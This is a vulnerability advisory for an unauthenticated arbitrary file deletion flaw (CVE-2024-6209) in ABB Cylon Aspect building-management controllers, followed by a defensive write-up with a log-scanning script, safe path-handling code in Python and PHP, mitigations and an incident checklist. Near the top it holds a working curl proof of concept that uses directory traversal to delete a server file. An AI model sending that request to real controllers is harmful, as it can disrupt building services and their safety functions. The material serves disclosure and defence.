ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
# Exploit Title : ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The BMS/BAS controller suffers from an arbitrary file deletion vulnerability.
Input passed to the 'file' parameter in 'databasefiledelete.php' is not properly
sanitised before being used to delete files. This can be exploited by an unauthenticated
attacker to delete files with the permissions of the web server using directory
traversal sequences passed within the affected POST parameter.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5827
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5827.php
CVE ID: CVE-2024-6209
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6209
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl -X POST http://192.168.73.31/databaseFileDelete.php \
> -d "file0=../../../../../../../../../home/MIX_CMIX/htmlroot/validate/validateHeader.php \
> &delete0=1 \
> &total=1 \
> &submitDeleteForm=Delete"
<META HTTP-EQUIV='Refresh' content='0;URL=databaseFile.php'>
ABB Cylon Aspect 3.08.01 - Arbitrary File Deletion Vulnerability (CVE-2024-6209)
Overview
ABB Cylon Aspect is a building energy management and control platform used in many commercial installations. A vulnerability identified in firmware versions up to and including 3.08.01 allows an unauthenticated remote attacker to trigger deletion of files accessible to the web server process. The issue was tracked as CVE-2024-6209 and disclosed by security researchers with vendor advisories following responsible disclosure.
What the vulnerability is (high level)
At its core the flaw is a path-handling and access-control weakness: user-supplied input that indicates a file to delete is not correctly validated or canonicalized before the server performs file-system deletion. This enables directory traversal style inputs to reference and remove files outside the intended directory scope.
Why this is serious
- Unauthenticated: attackers do not need valid credentials to attempt deletions.
- Privileges: deletions occur with the permissions of the web server process, which may include sensitive configuration or runtime files.
- Availability and safety: in building management systems, deleting configuration, scripts or service files can disrupt HVAC, lighting, or other building services with operational and safety implications.
Affected products and references
Reportedly affected components include multiple ASPECT and NEXUS series controllers and management software builds where firmware/software is at or below 3.08.01. See the official advisory for authoritative scope, patches and vendor guidance.
- CVE: CVE-2024-6209
- Vendor advisory and disclosure: consult ABB/authorized channels and the original research advisory for timelines and patch references.
Technical root cause (developer view)
The root cause is inadequate validation and canonicalization of a filename/path taken from client input before a file-system operation (delete) is executed. Typical safe approaches were not applied: inputs were not normalized to an absolute path, not checked against a whitelist or confined to a specific base directory, and symlink/permission considerations were not enforced.
Detection and indicators
Monitoring and detection can help identify attempts or successful exploitation:
- Web server access logs showing POST or other requests to file-management endpoints from unusual sources or times.
- Unexpected 200/204 responses to deletion requests followed by missing files or degraded application behavior.
- File system audit logs showing file removal operations initiated by the web server process.
- Integrity monitoring alerts for modified/missing configuration or executable files (tripwire, AIDE).
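The following scanner is an added example for this write-up, not code from the advisory or from ABB. It walks Common Log Format lines as written by the lighttpd and Apache builds listed in the advisory, flags any request to the file-management endpoint named there (databaseFileDelete.php) from a source outside an allowlist, and flags traversal sequences in the query string after repeated URL decoding. The log lines are constructed samples. Note the caveat it encodes: access logs do not record POST bodies, so the traversal payload from the PoC is normally invisible and the endpoint hit itself is the signal to review.

```python
"""Scan web server access logs for activity against the file-delete endpoint.

Added example for this write-up, not part of the advisory or the vendor's
software. Assumes Common Log Format lines and the endpoint name from the
advisory, /databaseFileDelete.php.
"""
import re
from urllib.parse import unquote

# Constructed sample log lines (not captured from a real device).
SAMPLE_LOG = """\
10.0.0.5 - - [21/Apr/2024:10:15:01 +0000] "GET /databaseFile.php HTTP/1.1" 200 512
10.0.0.9 - - [21/Apr/2024:10:15:07 +0000] "POST /databaseFileDelete.php HTTP/1.1" 200 72
10.0.0.9 - - [21/Apr/2024:10:15:09 +0000] "GET /databaseFileDelete.php?file0=..%252F..%252Fconfig.xml&delete0=1 HTTP/1.1" 200 72
10.0.0.7 - - [21/Apr/2024:10:16:00 +0000] "GET /index.php HTTP/1.1" 200 1024
"""

# Endpoints that perform file management; compared case-insensitively.
FILE_MGMT_ENDPOINTS = {"/databasefiledelete.php"}

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# ".." as a whole path component, with either separator, also right after = or &
TRAVERSAL_RE = re.compile(r'(^|[/\\=&])\.\.([/\\]|$)')


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded sequences (%252F) are exposed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_traversal(target):
    """True if the request target contains a '..' path component after decoding."""
    return TRAVERSAL_RE.search(decode_fully(target)) is not None


def scan_log(text, allowlist=frozenset()):
    """Return one alert per suspicious line: {'ip', 'ts', 'method', 'target', 'reasons'}."""
    alerts = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        path = m.group("target").split("?", 1)[0].lower()
        reasons = []
        # Any hit on the delete endpoint from a source outside the allowlist is
        # worth reviewing; access logs do not record POST bodies, so the
        # traversal payload itself is usually not visible here.
        if path in FILE_MGMT_ENDPOINTS and m.group("ip") not in allowlist:
            reasons.append("file-mgmt-endpoint")
        # Traversal in the query string is visible and is a strong signal.
        if has_traversal(m.group("target")):
            reasons.append("path-traversal")
        if reasons:
            alerts.append({
                "ip": m.group("ip"), "ts": m.group("ts"),
                "method": m.group("method"), "target": m.group("target"),
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(a["ts"], a["ip"], a["method"], a["target"], ",".join(a["reasons"]))
```

Run it against a real access log with the management workstation's address in the allowlist; anything left is either an unexpected client touching the delete endpoint or a visible traversal attempt, and both deserve a look at the file system audit trail for the same time window.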
Immediate mitigations (operational)
- Restrict network exposure: limit access to web management interfaces by IP allowlists, VPN-only access, or isolating management interfaces from the public internet.
- Harden access: require authentication and multi-factor authentication for management interfaces where possible.
- Apply vendor patches: prioritize firmware/software updates from ABB that remediate the issue.
- Compensating controls: implement WAF rules or proxy filters to block suspicious file-management requests as a temporary measure.
- Backups: ensure recent backups exist so deleted files can be restored quickly if needed.
Secure coding fixes (recommended)
Fixes should remove the assumption that user input is safe. The following defensive patterns are recommended for any server-side file operation:
- Canonicalize and normalize paths with realpath or equivalent and verify the resolved path is inside an expected base directory.
- Prefer a whitelist of filenames or identifiers mapped to safe internal paths (avoid accepting raw paths from clients).
- Disallow path-separator characters in client-supplied identifiers when possible; treat client input as opaque IDs.
- Run the web server as a minimally privileged user and restrict file permissions so the process cannot delete sensitive files.
- Maintain detailed audit logging whenever a delete operation is performed and require authorization checks.
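As an added example (not code from ABB or from the advisory), the block below implements the first two patterns in that list in Python and exercises them against a constructed directory layout: an ID-to-filename mapping, and a canonicalize-then-compare containment check built on os.path.commonpath. It deliberately includes the naive string-prefix comparison alongside it, because a prefix test accepts a sibling directory whose name merely starts with the base directory's name (files versus files2), an edge case the commonpath check rejects. The directory names, IDs and file names are invented for the demonstration.

```python
"""Containment check for a client-supplied file name before deletion.

Added example for this write-up (not code from ABB or the advisory).
"""
import os
import shutil
import tempfile


def resolve_within(base_dir, user_path):
    """Canonical absolute path of user_path under base_dir, or None if it escapes."""
    real_base = os.path.realpath(base_dir)
    # An absolute user_path makes os.path.join discard base_dir; the commonpath
    # test below still rejects it because the result does not sit under base.
    candidate = os.path.realpath(os.path.join(real_base, user_path))
    try:
        if os.path.commonpath([real_base, candidate]) != real_base:
            return None
    except ValueError:  # mixed absolute/relative paths or different drives
        return None
    if candidate == real_base:
        return None  # the base directory itself is never a deletable target
    return candidate


def naive_prefix_check(base_dir, user_path):
    """The flawed check, kept only to show the sibling-directory bypass."""
    real_base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(real_base, user_path))
    return candidate.startswith(real_base)


def delete_by_id(base_dir, file_id, id_to_name):
    """Preferred form: clients send an opaque ID, the server owns the file name."""
    name = id_to_name.get(file_id)
    if name is None:
        return False
    target = resolve_within(base_dir, name)
    if target is None or not os.path.isfile(target):
        return False
    os.unlink(target)
    return True


def demo():
    """Exercise the checks against a constructed directory layout."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "files")
    sibling = os.path.join(root, "files2")  # shares the string prefix of base
    os.mkdir(base)
    os.mkdir(sibling)
    for p in (os.path.join(base, "a.txt"), os.path.join(sibling, "secret.txt")):
        open(p, "w").close()
    try:
        # A symlink inside base that points outside: realpath follows it, so the
        # containment check sees the real target and rejects it.
        os.symlink(os.path.join(sibling, "secret.txt"), os.path.join(base, "link.txt"))
        symlink_out = resolve_within(base, "link.txt") is None
    except OSError:  # symlink creation unavailable on this platform
        symlink_out = None
    results = {
        "plain_ok": resolve_within(base, "a.txt") == os.path.join(os.path.realpath(base), "a.txt"),
        "traversal_rejected": resolve_within(base, "../files2/secret.txt") is None,
        "absolute_rejected": resolve_within(base, "/etc/hostname") is None,
        "naive_accepts_sibling": naive_prefix_check(base, "../files2/secret.txt"),
        "symlink_out_rejected": symlink_out,
        "delete_unknown_id": delete_by_id(base, "doc-9", {"doc-1": "a.txt"}),
        "delete_known_id": delete_by_id(base, "doc-1", {"doc-1": "a.txt"}),
        "file_gone": not os.path.exists(os.path.join(base, "a.txt")),
    }
    shutil.rmtree(root)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The same comparison rule applies to the PHP fixes later on this page: whatever language the handler is written in, compare the resolved path against the base directory plus a separator (or use a component-wise comparison), never against the bare base string.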
Example: safe file-delete pattern in PHP (defensive)
<?php
// Base directory that contains allowed files
$baseDir = '/var/www/aspect/files';

// Get the client-supplied identifier (not a raw path)
$fileId = $_POST['fileId'] ?? '';

// Map identifiers to safe filenames (preferred)
$whitelist = [
    'template-a' => 'template-a.html',
    'template-b' => 'template-b.html',
];

// Resolve using whitelist mapping
if (!isset($whitelist[$fileId])) {
    http_response_code(400);
    echo 'Invalid file identifier';
    exit;
}
$target = $baseDir . DIRECTORY_SEPARATOR . $whitelist[$fileId];

// Canonicalize and verify the resolved path is within baseDir.
// The trailing separator matters: without it a path under
// '/var/www/aspect/files2' would pass a plain prefix comparison
// against '/var/www/aspect/files'.
$realBase = realpath($baseDir);
$realTarget = realpath($target);
if ($realBase === false
    || $realTarget === false
    || strpos($realTarget, $realBase . DIRECTORY_SEPARATOR) !== 0
    || !is_file($realTarget)) {
    http_response_code(404);
    echo 'File not found';
    exit;
}

// Perform deletion with logging and authorization check
// (Assume authorization check has already succeeded)
if (!unlink($realTarget)) {
    http_response_code(500);
    echo 'Unable to delete file';
} else {
    // Log the deletion for auditing
    error_log('File deleted: ' . $realTarget . ' by ' . $_SERVER['REMOTE_ADDR']);
    echo 'Deleted';
}
?>
Explanation: This snippet demonstrates a defensive approach by mapping client-supplied identifiers to an internal whitelist of filenames, canonicalizing paths with realpath, ensuring the resolved path is inside the intended base directory, and performing the deletion only after these checks succeed. It also logs activity to support audit and incident response.
Alternative: canonicalization check (if mapping is not possible)
<?php
$baseDir = '/var/www/aspect/files';
$requested = $_POST['path'] ?? '';

// Reject empty input and embedded NUL bytes before touching the file system
if ($requested === '' || strpos($requested, "\0") !== false) {
    http_response_code(400);
    echo 'Invalid path';
    exit;
}

// Build path relative to base and canonicalize
$combined = $baseDir . DIRECTORY_SEPARATOR . $requested;
$realBase = realpath($baseDir);
$realCombined = realpath($combined);
// Compare against the base plus a separator so that a sibling directory
// such as '/var/www/aspect/files2' cannot satisfy the prefix check
if ($realBase === false
    || $realCombined === false
    || strpos($realCombined, $realBase . DIRECTORY_SEPARATOR) !== 0) {
    http_response_code(400);
    echo 'Invalid path';
    exit;
}

// Additional checks: the target must be a regular file and the un-resolved
// path must not be a symlink. realpath() has already followed any symlink,
// so is_link() has to be tested on $combined, not on $realCombined.
if (!is_file($realCombined) || is_link($combined)) {
    http_response_code(400);
    echo 'Invalid file';
    exit;
}

if (!unlink($realCombined)) {
    http_response_code(500);
    echo 'Unable to delete file';
    exit;
}
echo 'Deleted';
?>
Explanation: This pattern shows canonicalization using realpath and then comparing the resolved path to the base directory to prevent traversal outside the intended directory. It also checks that the target is a regular file and not a symlink. While safer than accepting raw input, prefer an ID-to-filename mapping when practical.
Long-term recommendations for vendors and operators
- Perform secure code reviews focusing on file-system APIs and input handling.
- Introduce automated fuzzing and static analysis specifically targeting path-handling routines.
- Harden defaults: minimize web server privileges, lock down management interfaces, and provide clear guidance for network segmentation.
- Provide signed, verifiable firmware updates and clear patch timelines to customers.
Incident response checklist (if exploitation is suspected)
- Isolate affected device(s) from the network to prevent further manipulation.
- Collect and preserve logs (web server, system audit, application logs) for forensic analysis.
- Restore missing files from verified backups and validate integrity before returning to production.
- Apply vendor patches and change any administrative credentials used by management interfaces.
- Review related devices for similar exposures and search logs for suspicious activity patterns.
Conclusion
The file-deletion vulnerability in ABB Cylon Aspect prior to 3.08.02 demonstrates a very common and impactful class of web-application errors: improper handling of client-controlled file paths. Immediate mitigation includes network restrictions, applying vendor patches and backups; long-term mitigation requires defensive coding patterns such as canonicalization, whitelist mapping, least privilege, and logging. Operators of building management systems should treat management interfaces as sensitive infrastructure and apply layered protections accordingly.